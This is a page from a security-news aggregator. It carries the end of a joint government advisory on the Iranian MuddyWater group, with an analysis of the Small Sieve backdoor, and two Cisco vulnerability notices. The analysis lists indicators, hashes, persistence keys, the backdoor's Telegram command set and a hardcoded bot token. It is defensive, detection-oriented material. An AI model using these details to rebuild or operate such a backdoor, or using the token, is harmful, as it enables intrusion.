  • Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. Prioritize patching known exploited vulnerabilities.
Additional Resources
  • For more information on Iranian government-sponsored malicious cyber activity, see CISA's webpage – Iran Cyber Threat Overview and Advisories and CNMF's press release – Iranian intel cyber suite of malware uses open source tools
  • For information and resources on protecting against and responding to ransomware, refer to StopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and alerts.
  • The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
References

[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools
[2] MITRE ATT&CK: MuddyWater 

Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.

Purpose

This document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States’ NSA agrees with this attribution and the details provided in this report.

Appendix A: IOCs

The following IP addresses are associated with MuddyWater activity:

5.199.133[.]149
45.142.213[.]17    
45.142.212[.]61
45.153.231[.]104 
46.166.129[.]159 
80.85.158[.]49 
87.236.212[.]22
88.119.170[.]124 
88.119.171[.]213
89.163.252[.]232
95.181.161[.]49
95.181.161[.]50
164.132.237[.]65
185.25.51[.]108
185.45.192[.]228 
185.117.75[.]34
185.118.164[.]21
185.141.27[.]143
185.141.27[.]248 
185.183.96[.]7
185.183.96[.]44
192.210.191[.]188
192.210.226[.]128

Appendix B: Small Sieve

Note: the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.

Metadata

Table 2: Gram.app.exe Metadata

Filename gram_app.exe  Description NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key  Size 16999598 bytes  MD5 15fa3b32539d7453a9a85958b77d4c95  SHA-1 11d594f3b3cf8525682f6214acb7b7782056d282  SHA-256 b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054  Compile Time 2021-09-25 21:57:46 UTC 

 

Table 3: Index.exe Metadata

Filename  index.exe  Description The final PyInstaller-bundled Python 3.9 backdoor  Size 17263089 bytes  MD5 5763530f25ed0ec08fb26a30c04009f1  SHA-1 2a6ddf89a8366a262b56a251b00aafaed5321992  SHA-256 bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2   Compile Time 2021-08-01 04:39:46 UTC    Functionality  Installation 

Small Sieve is distributed as a large (16MB) NSIS installer named gram_app.exe, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary index.exe is installed in the user’s AppData/Roaming directory and is added as a Run key in the registry to enabled persistence after reboot. 

The installer then executes the backdoor with the “Platypus” argument [T1480], which is also present in the registry persistence key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift. 

Configuration 

The backdoor attempts to restore previously initialized session data from %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt. 

If this file does not exist, then it uses the hardcoded values listed in table 4:

Table 4: Credentials and Session Values

Field  Value Description Chat ID 2090761833  This is the Telegram Channel ID that beacons are sent to, and, from which, tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed.  Bot ID Random value between 10,000,000 and 90,000,000  This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with /com[Bot ID] in order to be processed by the malware. Telegram Token  2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY  This is the initial token used to authenticate each message to the Telegram Bot API.   Tasking 

Small Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host’s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the python-telegram-bot module. 

Two task formats are supported: 

  • /start – no argument is passed; this causes the beacon information to be repeated. 
  • /com[BotID] [command] – for issuing commands passed in the argument. 

The following commands are supported by the second of these formats, as described in table 5: 

Table 5: Supported Commands

Command Description delete  This command causes the backdoor to exit; it does not remove persistence.  download url””filename  The URL will be fetched and saved to the provided filename using the Python urllib module urlretrieve function.   change token””newtoken  The backdoor will reconnect to the Telegram Bot API using the provided token newtoken. This updated token will be stored in the encoded MicrosoftWindowsOutlookDataPlus.txt file.  disconnect  The original connection to Telegram is terminated. It is likely used after a change token command is issued. 

 

Any commands other than those detailed in table 5 are executed directly by passing them to cmd.exe /c, and the output is returned as a reply.

Defense Evasion  Anti-Sandbox 

Figure 1: Execution Guardrail

Threat actors may be attempting to thwart simple analysis by not passing “Platypus” on the command line. 

String obfuscation 

Internal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A decryption script is included in Appendix B.

Communications  Beacon Format 

Before listening for tasking using CommandHandler objects from the python-telegram-bot module, a beacon is generated manually using the standard requests library:

Figure 2: Manually Generated Beacon

The hex host data is encoded using the byte shuffling algorithm as described in the “Communications (Traffic obfuscation)” section of this report. The example in figure 2 decodes to: 

admin/WINDOMAIN1 | 10.17.32.18

  Traffic obfuscation 

Although traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a hex byte shuffling algorithm. A Python3 implementation is shown in figure 3.

 

Figure 3: Traffic Encoding Scheme Based on Hex Conversion and Shuffling

  Detection 

Table 6 outlines indicators of compromise.
 

Table 6: Indicators of Compromise

Type Description Values Path Telegram Session Persistence File (Obfuscated)  %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt  Path Installation path of the Small Sieve binary  %AppData%\OutlookMicrosift\index.exe  Registry value name Persistence Registry Key pointing to index.exe with a “Platypus” argument HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift    String Recover Script

Figure 4: String Recovery Script

Contact Information

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at CISAServiceDesk@cisa.dhs.gov. For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at Cybersecurity_Requests@nsa.gov. United Kingdom organizations should report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or for urgent assistance call 03000 200 973.

Revisions
  • February 24, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

Cisco FXOS and NX-OS Software Cisco Discovery Protocol Service Denial of Service Vulnerability

Cisco Security Advisories - Wed, 2022-02-23 16:00

A vulnerability in the Cisco Discovery Protocol service of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause the service to restart, resulting in a denial of service (DoS) condition.

This vulnerability is due to improper handling of Cisco Discovery Protocol messages that are processed by the Cisco Discovery Protocol service. An attacker could exploit this vulnerability by sending a series of malicious Cisco Discovery Protocol messages to an affected device. A successful exploit could allow the attacker to cause the Cisco Discovery Protocol service to fail and restart. In rare conditions, repeated failures of the process could occur, which could cause the entire device to restart.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cdp-dos-G8DPLWYG

This advisory is part of the February 2022 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: February 2022 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.


Security Impact Rating: Medium
CVE: CVE-2022-20625
Categories: Security Alerts

Cisco NX-OS Software NX-API Command Injection Vulnerability

Cisco Security Advisories - Wed, 2022-02-23 16:00

A vulnerability in the NX-API feature of Cisco NX-OS Software could allow an authenticated, remote attacker to execute arbitrary commands with root privileges.

The vulnerability is due to insufficient input validation of user supplied data that is sent to the NX-API. An attacker could exploit this vulnerability by sending a crafted HTTP POST request to the NX-API of an affected device. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the underlying operating system.

Note: The NX-API feature is disabled by default.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-nxapi-cmdinject-ULukNMZ2

This advisory is part of the February 2022 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: February 2022 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.


Security Impact Rating: High
CVE: CVE-2022-20650
Categories: Security Alerts

Pages

Subscribe to Willing Minds aggregator